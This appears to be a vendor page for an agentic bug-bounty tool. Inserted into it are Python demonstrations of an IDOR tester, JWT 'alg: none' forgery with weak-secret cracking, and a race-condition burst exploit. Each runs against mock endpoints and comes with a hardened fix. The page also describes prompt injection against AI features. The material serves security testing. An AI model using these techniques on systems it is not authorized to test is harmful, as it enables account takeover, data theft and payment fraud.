
Hunt surfaces

Bounties

High-signal bug classes. Validated findings. Submission-ready output. The full agentic bounty execution layer.

Bug classes the agent hunts

IDOR, Auth bypass, Priv escalation, Race condition, Prompt injection, Misconfig, Access control, Session abuse

+116%: IDOR report growth over 5 years on HackerOne
+540%: Prompt injection growth YoY (HackerOne 2025)
70-82%: Hunters already using AI tools
$81M+: Annual HackerOne payouts, 13% YoY growth

Narrow focus. Higher payout rate.

Most scanners try to cover everything and end up confirming nothing. They generate hundreds of low-confidence alerts across XSS, SQLi, open redirects, and outdated libraries — the kind of report that takes more time to triage than it does to submit.

RaSEC Hunt focuses on a narrower set of bug classes deliberately: access control failures, auth bypasses, and privilege escalation bugs. These are the categories that reliably produce $500 to $10,000+ payouts on major programs, require reasoning about application logic (not just payload matching), and benefit most from an agentic workflow.

Every finding the agent surfaces has gone through a mandatory validation gate: deterministic reproduction, request/response evidence, and a clear explanation of the impact. Nothing is listed as a "potential" issue without a working reproduction chain.

The result is a smaller set of findings that are actually submittable — not a noise report that requires a manual review pass before you can do anything with it.

Deep dive by bug class

Highest payout

Access control and IDOR

The highest-growth bug class on HackerOne

IDOR report growth on HackerOne hit +116% over 5 years and +29% year-over-year (HackerOne 2025). Horizontal and vertical access control failures are consistently among the highest-impact finding categories in modern bug bounty programs. IDOR on user IDs, object references, or API parameters — the fundamental pattern of one user accessing another user's data without authorisation — remains underexplored by most automated tools because it requires understanding the application's permission model, not just firing payloads.

RaSEC Hunt builds a session-aware model of the target, enumerates object references across authenticated user contexts, and tests cross-context access systematically. If it finds a working IDOR, it generates the reproduction request and validates the response diff before promoting the finding.
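The cross-context check described above, as an added example (this is illustrative code, not RaSEC Hunt's own implementation): two authenticated sessions each own a few objects, every object is replayed under the other session, and a finding is promoted only when the cross-context response is a 200 with a body identical to the owner's view on three consecutive attempts, which is the deterministic-reproduction gate the page describes later. The in-memory invoice endpoint, its bearer tokens, the invoice data and the URL layout in `repro_curl` are all constructed assumptions standing in for a real target.

```python
"""Differential IDOR tester. Added example, not RaSEC code; the endpoint,
tokens and data below are constructed stand-ins for a real target."""

# Constructed sample data: two users, each owning invoices.
INVOICES = {
    101: {"owner": "alice", "total": 120.0},
    102: {"owner": "alice", "total": 80.0},
    201: {"owner": "bob", "total": 9999.0},
}
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}   # bearer token -> user

def vulnerable_get_invoice(token, invoice_id):
    """Hypothetical endpoint: authenticates the caller, never checks ownership."""
    if token not in SESSIONS:
        return 401, {"error": "unauthenticated"}
    inv = INVOICES.get(invoice_id)
    return (404, {"error": "not found"}) if inv is None else (200, inv)

def fixed_get_invoice(token, invoice_id):
    """Same endpoint with an object-level authorization check; a foreign object
    is answered exactly like a missing one, so IDs cannot be enumerated either."""
    user = SESSIONS.get(token)
    if user is None:
        return 401, {"error": "unauthenticated"}
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != user:
        return 404, {"error": "not found"}
    return 200, inv

def cross_context_test(endpoint, contexts, attempts=3):
    """contexts maps each session token to the object IDs it legitimately owns
    (the hunter created them). Every (owner, object) pair is replayed under every
    other session. A finding is promoted only when the cross-context response is
    200 with a body identical to the owner's view on all `attempts` tries."""
    findings = []
    for owner_tok, owned in contexts.items():
        for obj_id in owned:
            owner_resp = endpoint(owner_tok, obj_id)
            for other_tok in contexts:
                if other_tok == owner_tok:
                    continue
                replays = [endpoint(other_tok, obj_id) for _ in range(attempts)]
                if all(r == owner_resp and r[0] == 200 for r in replays):
                    findings.append({
                        "object_id": obj_id,
                        "victim": owner_tok,
                        "attacker": other_tok,
                        "evidence": {"owner_view": owner_resp, "cross_view": replays[0]},
                    })
    return findings

def repro_curl(base_url, finding):
    """Reproduction line for the PoC report. The URL layout is an assumption."""
    return (f"curl -s -H 'Authorization: Bearer {finding['attacker']}' "
            f"{base_url}/invoices/{finding['object_id']}")

# Constructed ownership map: which objects each session created.
CONTEXTS = {"tok-alice": [101, 102], "tok-bob": [201]}

if __name__ == "__main__":
    for f in cross_context_test(vulnerable_get_invoice, CONTEXTS):
        print(f["object_id"], f["victim"], "->", f["attacker"],
              repro_curl("https://target.example", f))
    print("fixed endpoint findings:", cross_context_test(fixed_get_invoice, CONTEXTS))
```

Against the vulnerable endpoint the tester reports three findings (both of alice's invoices readable by bob, and bob's by alice); against the fixed endpoint it reports none, because a foreign object returns the same 404 as a missing one and the diff never matches.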

Available: Pro + Elite

High signal

Authentication bypass

Token manipulation and session confusion

Authentication bypass bugs — weak JWT signing, predictable tokens, account takeover via password reset flows, or session state confusion — are high-severity by definition and frequently critical in bounty programs. They require understanding the auth flow, not just brute-forcing parameters.

The agent traces auth flows, extracts token patterns, tests header manipulation and role escalation vectors, and validates bypass conditions with a clean before/after evidence bundle. Every step in the auth test chain is logged.
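Two of the token-level bypasses named above, as an added example (illustrative code, not RaSEC Hunt's own): an `"alg": "none"` bypass against a verifier that lets the token header choose the algorithm, beside the hardened verifier that pins HS256 server-side, and an offline dictionary attack that recovers a weak HS256 secret from a captured token and forges an admin claim with it. Everything is standard library; the secret, wordlist and claims are constructed sample data.

```python
"""JWT weak-signing checks. Added example, not RaSEC code; SERVER_SECRET,
WORDLIST and the claims are constructed sample data."""
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def make_jwt(claims: dict, secret: bytes, alg: str = "HS256") -> str:
    """Mint a compact JWT. alg="none" yields an unsigned token (empty signature)."""
    header = {"alg": alg, "typ": "JWT"}
    body = ".".join(b64url(json.dumps(x, separators=(",", ":")).encode())
                    for x in (header, claims))
    if alg == "none":
        return body + "."
    sig = hmac.new(secret, body.encode(), hashlib.sha256).digest()
    return body + "." + b64url(sig)

def _hs256_matches(h: str, p: str, s: str, secret: bytes) -> bool:
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected).encode(), s.encode())

def verify_trusting_header(token: str, secret: bytes):
    """VULNERABLE: the algorithm is read from the attacker-controlled header,
    so "alg": "none" disables signature checking entirely."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none" or (alg == "HS256" and _hs256_matches(h, p, s, secret)):
        return json.loads(b64url_decode(p))
    return None

def verify_pinned(token: str, secret: bytes):
    """HARDENED: the server decides the algorithm; the header must merely agree,
    and an empty signature is rejected outright."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    if not s or not _hs256_matches(h, p, s, secret):
        return None
    return json.loads(b64url_decode(p))

def crack_hs256_secret(token: str, wordlist):
    """Offline dictionary attack on a captured token; returns the secret or None."""
    h, p, s = token.split(".")
    for candidate in wordlist:
        if _hs256_matches(h, p, s, candidate):
            return candidate
    return None

SERVER_SECRET = b"secret"                                   # deliberately weak
WORDLIST = [b"password", b"changeme", b"secret", b"letmein"]  # constructed

def demo():
    """Run both attacks against both verifiers; returns the evidence bundle."""
    captured = make_jwt({"sub": "alice", "role": "user"}, SERVER_SECRET)
    forged_none = make_jwt({"sub": "alice", "role": "admin"}, b"", alg="none")
    recovered = crack_hs256_secret(captured, WORDLIST)
    forged_signed = make_jwt({"sub": "alice", "role": "admin"}, recovered) if recovered else None
    return {
        "none_accepted_by_vulnerable": verify_trusting_header(forged_none, SERVER_SECRET),
        "none_accepted_by_pinned": verify_pinned(forged_none, SERVER_SECRET),
        "recovered_secret": recovered,
        "forged_accepted_by_pinned": verify_pinned(forged_signed, SERVER_SECRET) if forged_signed else None,
    }

if __name__ == "__main__":
    out = {k: (v.decode() if isinstance(v, bytes) else v) for k, v in demo().items()}
    print(json.dumps(out, indent=2))
```

The two results tell different stories for the report: the `none` forgery is a verifier bug (the pinned verifier rejects it), while the dictionary hit is a key-management bug (the pinned verifier correctly accepts the forged admin token because the signature is genuine), so the before/after evidence should name which of the two the target exhibits.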

Available: Pro + Elite

Elite only

Race conditions

TOCTOU windows and parallel request exploitation

Race conditions in financial flows, inventory systems, or coupon redemption are notoriously hard to find manually. The time-of-check to time-of-use (TOCTOU) window is often measured in milliseconds. Elite tier uses parallel request bursting to probe these windows systematically across transactional endpoints.

The agent identifies idempotency-sensitive endpoints (one coupon, one withdrawal, one vote per user), issues synchronized parallel bursts, and treats more successful responses than the endpoint should ever allow as evidence of the race. Full HTTP timing and response delta are included in the PoC.
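The burst-and-validate loop described above, as an added example (illustrative code, not RaSEC Hunt's own): a constructed in-process coupon store with a check-then-act redemption whose simulated database round trip is the TOCTOU window, a burst helper that releases N workers from a barrier so their requests land inside that window, and a validator that records the success count and latency spread for the PoC. The hardened variant makes the check and the update one atomic step under a lock, the in-process equivalent of a `SELECT ... FOR UPDATE` or a conditional `UPDATE ... WHERE used = false`.

```python
"""Race-condition burst tester. Added example, not RaSEC code; CouponStore is a
constructed stand-in for a real redemption endpoint."""
import threading
import time

class CouponStore:
    def __init__(self, code, value):
        self.coupons = {code: {"used": False, "value": value}}
        self.balance = 0
        self.lock = threading.Lock()

    def redeem_vulnerable(self, code, window=0.05):
        """VULNERABLE: check, then act, with a simulated DB round trip between."""
        c = self.coupons[code]
        if c["used"]:
            return 409, "already redeemed"
        time.sleep(window)          # the TOCTOU window (simulated SELECT -> UPDATE gap)
        c["used"] = True
        self.balance += c["value"]
        return 200, "credited"

    def redeem_fixed(self, code, window=0.05):
        """HARDENED: check and update are one atomic step under the lock."""
        with self.lock:
            c = self.coupons[code]
            if c["used"]:
                return 409, "already redeemed"
            time.sleep(window)
            c["used"] = True
            self.balance += c["value"]
            return 200, "credited"

def burst(handler, code, n=20):
    """Fire n requests as simultaneously as the host allows: every worker blocks
    on a barrier and they release together. Returns (status, latency_s) per request."""
    barrier = threading.Barrier(n)
    results = [None] * n

    def worker(i):
        barrier.wait()
        t0 = time.perf_counter()
        status, _ = handler(code)
        results[i] = (status, time.perf_counter() - t0)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results

def race_evidence(results, expected_successes=1):
    """Validation: more 200s than the endpoint should ever allow is the race.
    Latency spread goes into the PoC alongside the response delta."""
    successes = sum(1 for status, _ in results if status == 200)
    latencies = sorted(lat for _, lat in results)
    return {
        "successes": successes,
        "confirmed": successes > expected_successes,
        "latency_min_ms": round(latencies[0] * 1000, 1),
        "latency_max_ms": round(latencies[-1] * 1000, 1),
    }

if __name__ == "__main__":
    for name in ("redeem_vulnerable", "redeem_fixed"):
        store = CouponStore("WELCOME10", 10)
        evidence = race_evidence(burst(getattr(store, name), "WELCOME10"))
        print(name, evidence, "balance:", store.balance)
```

Against a live target the same loop is driven by an HTTP client with keep-alive connections pre-opened before the barrier releases, so that TLS and TCP setup do not eat the window; the barrier is what makes the burst synchronized rather than merely concurrent.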

Available: Elite

AI targets

Prompt injection

AI endpoint exploitation

As more applications embed LLM-powered features (chat assistants, document summarizers, code helpers), prompt injection has become a legitimate high-severity class in major programs. Injecting adversarial instructions through user-controlled input into an AI processing pipeline can result in data exfiltration, SSRF through model-invoked tools, or privilege escalation; the impact depends on what the model is allowed to read and call, not on the injection itself.

Elite tier agents test AI-powered endpoints for instruction injection, context leakage, and unsafe tool delegation chains — patterns most scanners cannot evaluate at all.

Available: Elite

Bug class severity matrix

Signal level reflects approximate payout potential from public program data. Actual bounties vary by program and impact.

Bug class              Signal level        Required tier   Reproduction mode
IDOR (horizontal)      Critical priority   Pro             Automated
Auth bypass            Critical priority   Pro             Automated
Privilege escalation   High priority       Pro             Automated
Race condition         High priority       Elite           Automated
Prompt injection       High priority       Elite           Semi-auto
Misconfig / header     Low priority        Free            Heuristic

From surface to submission

Define the hunt surface

Paste program scope. The agent maps auth flows, API endpoints, and object reference patterns before testing anything.

Agent executes

Systematic traversal of the target surface across all supported bug classes for your tier. Live activity streamed to your dashboard.

Validation gate

Every potential finding goes through deterministic reproduction: three independent attempts, each with the full request and response logged. A finding that does not reproduce on every attempt is not promoted.

PoC assembled

Confirmed findings get a platform-ready PoC report: summary, CVSS, reproduction steps, curl command, evidence diff. Copy. Paste. Submit.

No inflated claim counts. Every finding in the output has a working reproduction chain, a confirmed response diff, and a formatted submission report. If the agent cannot reproduce it, it stays pending.

RaSEC Platform

Start your first agentic hunt today

IDOR and auth bypass finding
Deterministic reproduction
PoC reports for your platform
No credit card. Cancel anytime. Free forever tier.